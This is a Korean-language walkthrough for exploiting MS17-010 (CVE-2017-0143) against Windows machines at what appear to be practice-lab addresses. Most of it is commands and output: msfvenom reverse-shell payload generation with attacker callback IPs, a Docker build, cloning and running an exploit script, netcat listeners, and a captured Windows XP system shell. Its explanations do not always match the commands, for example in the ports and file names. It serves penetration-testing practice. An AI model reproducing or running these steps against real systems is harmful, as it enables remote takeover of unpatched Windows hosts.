
MS17-010_CVE-2017-0143
🖥️ -h3x0v3rl0rd- #️⃣ CVE-2017-0143
msfvenom을 사용하여 페이로드 생성:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=1337 -f exe -o ms17-010.exe
-p windows/shell_reverse_tcp: 페이로드(Windows용 역방향 TCP 셸)를 지정합니다.LHOST=10.10.14.4: 공격자의 IP 주소(대상이 연결할 주소)입니다.LPORT=443: 공격자 시스템에서 연결을 수신할 포트입니다.-f exe: 페이로드를 실행 파일로 출력합니다.-a x86: 아키텍처(32비트)를 지정합니다.-o rev.exe: 페이로드를 rev.exe로 저장합니다.Docker 컨테이너 설정:
Docker 설정 단계:
sudo apt-get install docker.io
폴더 구조 생성:
mkdir exploit
cd exploit
touch Dockerfile
echo "impacket==0.9.23" > requirements.txt
Dockerfile: Docker 컨테이너를 빌드하기 위한 지침이 포함되어 있습니다.requirements.txt: Python 의존성 목록(예: impacket)입니다.Dockerfile 작성:
FROM python:2.7-alpine
RUN apk --update --no-cache add \
git \
zlib-dev \
musl-dev \
libc-dev \
gcc \
libffi-dev \
openssl-dev && \
rm -rf /var/cache/apk/*
RUN mkdir -p /opt/exploit
COPY requirements.txt /opt/exploit
COPY ms17-010.exe /opt/exploit
WORKDIR /opt/exploit
RUN pip install -r requirements.txt
FROM python:2.7-alpine: Python 2.7이 포함된 경량 Alpine Linux 이미지를 사용합니다.RUN apk --update --no-cache add: 필요한 의존성(예: git, gcc)을 설치합니다.COPY rev.exe /opt/cattime: 역방향 셸 실행 파일(rev.exe)을 컨테이너 안으로 복사합니다.RUN pip install -r requirements.txt: Python 의존성(예: impacket)을 설치합니다.Docker 컨테이너 빌드:
sudo docker build -t exploit .
컨테이너 실행:
sudo docker run -it exploit /bin/sh
익스플로잇 다운로드 및 실행:
git clone https://github.com/h3x0v3rl0rd/MS17-010_CVE-2017-0143.git
cd MS17-010_CVE-2017-0143
python send_and_execute.py 10.10.10.4 ../ms17-010.exe
역방향 셸:
nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.4] 1035
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
git clone https://github.com/h3x0v3rl0rd/MS17-010_CVE-2017-0143.git
cd MS17-010_CVE-2017-0143/
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.9 LPORT=1337 -f exe -o ms17-010.exe
nc 리스너 생성
nc -nlvp 1337
python2.7 send_and_execute.py 10.129.163.162 ms17-010.exe

이와 같은 오류가 발생하면 다음 단계를 따르세요:
cd MS17-010_CVE-2017-0143/
sudo python2.7 get-pip.py
pip2.7 install --upgrade setuptools
python2.7 -m pip install impacket
이제 익스플로잇을 실행할 수 있습니다:


이 익스플로잇은 python2로 작성되었으며 impacket, pycrypto와 같은 라이브러리가 필요합니다. 이를 위해 가상 환경을 설정해야 하며, 여기서 virtualenv 프로그램이 도움을 줍니다. 환경을 생성한 후 source 유틸리티 프로그램을 사용하여 해당 환경을 활성화할 수 있습니다. 최신 Kali에서는 python3가 전역 인터프리터로 설정되어 있고 익스플로잇은 python2로 작성되었기 때문에 python2를 인터프리터로 사용합니다.
가상 환경을 사용하는 이유는 무엇인가요? 자세한 내용은 이 링크를 확인하세요. https://www.dabapps.com/blog/introduction-to-pip-and-virtualenv-python/
virtualenv -p python2 venv
source venv/bin/activate
pip install impacket
pip install pycrypto


python checker.py 10.10.10.4

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.12 LPORT=4445 -f exe > shell.exe

python send_and_execute.py 10.10.10.4 shell.exe 445 browser

nc -nlvp 4445
